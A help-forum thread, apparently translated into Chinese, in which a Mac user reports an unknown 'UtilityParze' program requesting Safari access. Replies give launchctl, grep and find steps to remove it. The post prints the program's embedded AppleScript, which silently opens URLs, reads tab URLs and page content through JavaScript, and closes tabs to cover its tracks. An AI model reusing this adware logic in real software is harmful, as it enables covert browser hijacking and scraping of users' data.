我正在使用带有 OS X Catalina 的 Macbook Air。
今天,当我打开 Safari 时,弹出一个安全对话框,询问是否允许UtilityParze访问 Safari。到目前为止,我还没有在网上找到任何关于此应用程序的提及,但我/Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParze在我的文件系统中找到了一个可执行文件。
它大多不是人类可读的,但这里有一些嵌入式脚本:
if application "Safari" is running then
run script "tell application \"Safari\" to return URL of front document"
end if
if application "Safari" is running then
tell application id (id of application "Safari") to open location "[URL_TO_OPEN]"
tell application id (id of application "Safari") to activate
delay 5.0
end if
if application "Safari" is running then
run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window
tell application id (id of application \"Safari\") to open location \"[UA_URL]\"
tell application id (id of application \"Safari\") to set the content to the text of document 1
repeat until length of (content as string) is not 0
delay 0.2
tell application id (id of application \"Safari\") to set the content to the text of document 1
end repeat
tell front window of application \"Safari\" to close last tab
tell front window of application \"Safari\" to set current tab to tab activeIndex
return content as string"
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\" to get URL of active tab of first window"
end if
if application "Google Chrome" is running then
tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]"
tell application id (id of application "Google Chrome") to activate
delay 5.0
end if
if application "Google Chrome" is running then
tell application "Google Chrome"
open location "[UA_URL]"
end tell
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\"
set the activeUrl to get URL of front window's active tab
open location \"[UA_URL]\"
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
repeat until length of (content as string) is not 0
delay 0.2
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
end repeat
tell front window's active tab to close
set tabIndex to 0
repeat with currentTab in (tabs of (front window))
set tabIndex to tabIndex + 1
if URL of currentTab is activeUrl then
set (active tab index of (front window)) to tabIndex
exit repeat
end if
end repeat
return content as string
end tell"
end if
有人听说过这个程序吗?到目前为止,我只是拒绝了它的访问,但还没有删除它。我猜当我尝试打开浏览器时,最初会重新路由到页面,这很烦人。
您是否尝试过例如
launchctl list | grep Utility在终端中运行以查看启动代理是否正在运行,从而使应用程序保持运行?如果是这样,您可能应该运行launchctl unload com.UtilityParze(或之前列出时显示的任何标识符/名称)以确保launchd不会尝试使应用程序保持活动状态,然后删除所有相关文件。launchctl list com.UtilityParze应该给你一个关于这些文件是什么/在哪里的提示。此启动代理的 .plist 定义最可能的三个位置是:
/Library/LaunchAgents/Library/LaunchDaemons/Users/markus/Library/LaunchAgents在所有这些文件夹中查找
com.UtilityParze.plist. 但他们可能会使用隐身名称,因此通过检查launchctl可能会更好。另一种选择是在所有 .plist 定义中查找可疑名称,例如:grep -R Parze /Library/LaunchAgentsgrep -R Parze ~/Library/LaunchAgentssudo grep -R Parze /Library/LaunchDaemons启动代理定义文件必须包含可执行文件的路径才能执行任何操作,并且如果恶意软件创建者没有将文件分散到多个位置,则所有违规文件可能与可执行文件一起位于某个文件夹中。找到可执行文件,您可能还会找到要删除的所有其他文件。但请确保先卸载代理。
另一种希望发现恶意软件文件的方法是
find在您的所有库上运行:sudo find /Library -iname Parzefind ~/Library -iname Parze我遇到了类似的问题,即在 LaunchAgents 文件夹和 Library 文件夹中的其他几个位置找到奇怪的文件。UtilityData.plist、UtilityParze.plist 和一长串 VSearch 木马文件(MacInstallPall,还有一些 MacInstall*%&+@ 文件在其中。根据 Malwarebytes,它们是恶意软件,需要隔离。我先隔离然后删除他们。
我刚刚(2020 年 1 月 12 日星期日上午 9:52 左右)在 Mojave 中出现了类似的“Utilityparve”提示,要求获得访问 Google Chrome 的权限。我不允许访问。
过去我有过类似的神秘浏览器访问请求,这些请求与我必须手动清除系统的广告软件相关联。
“Macperformance”是一个似乎反复进入活动用户“库”中非常相似位置的示例。我不知道“UtilityParve”和“Macperformance”之间是否有直接联系,但现在它们都存在于我的库中。
“Utilityparve 位于“UpdatesMac”文件夹中,而“Macperformance”位于“UpdateMac”文件夹中。
由于在线上没有对其功能的描述,我将删除“Utilityparve”以及被认为是广告软件的“Macperformance”。
一个名为“Easyfind”的应用程序可以非常轻松地搜索文件。我刚刚搜索了“UtilityParze”,然后输出了 4 个结果。我一次将它们全部删除。